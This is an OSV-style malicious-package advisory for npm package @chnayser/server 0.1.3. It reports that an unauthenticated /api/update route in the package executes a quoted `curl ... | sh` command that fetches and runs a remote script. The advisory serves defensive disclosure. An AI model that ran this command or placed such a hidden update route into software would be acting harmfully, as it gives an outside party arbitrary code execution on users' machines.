{"id":"MAL-2026-13374","summary":"Malicious code in @chnayser/server (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (bdabed9cce6fadeadd8cdbed43b435030ae2e1807a6b13b2815ac6389cfd1c65)\nThe package's Express server (started via the advertised startServer/createApp entry points) mounts a GET route at /api/update whose handler executes `curl https://npm.nzeros.me/chnayser | sh` via child_process.execSync (dist/routes.js line 22). The route requires no authentication and is framed as a health/update probe. Any client that can reach the bound address (default 127.0.0.1:4300, overridable via a host option) causes the server process to fetch a shell script from npm.nzeros.me — a domain unrelated to the package's declared publisher — and execute it under /bin/sh. The fetched content is mutable and controlled by whoever owns npm.nzeros.me, giving that party arbitrary remote code execution on the installer's host whenever the server is running and the endpoint is reachable.\n","modified":"2026-08-05T22:19:52.306516848Z","published":"2026-08-05T21:21:49Z","database_specific":{"malicious-packages-origins":[{"versions":["0.1.3"],"id":"IN-MAL-2026-015897","import_time":"2026-08-05T21:31:21.642490221Z","modified_time":"2026-08-05T21:21:49Z","sha256":"bdabed9cce6fadeadd8cdbed43b435030ae2e1807a6b13b2815ac6389cfd1c65","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@chnayser/server/v/0.1.3"}],"affected":[{"package":{"name":"@chnayser/server","ecosystem":"npm","purl":"pkg:npm/%40chnayser/server"},"versions":["0.1.3"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"f07197197eb352a08fbbd24c960b412efb07da27b40486a9ff4c63741f8754a056d7e8","path":"dist/routes.js","sha256":"750917749909e7918bc705eac3e147be948e02e535039b760cb71daff4eabc02"}],"package_integrity":[{"filename":"server-0.1.3.tgz","hashes":{"sha1":"f1e1e4b510404ab35d093532317996dc6afe0907","sha512_sri":"sha512-SdC8h4Ts/9RrrgXTUQWbTmsiFWwxpY8YezoVKH4WYJm2Q5s8G/oiQVYf8DnmiNaz9bIsxPKUb+NFB1Bpnfu0MA=="}}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@chnayser/server/MAL-2026-13374.json"}}],"schema_version":"1.8.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}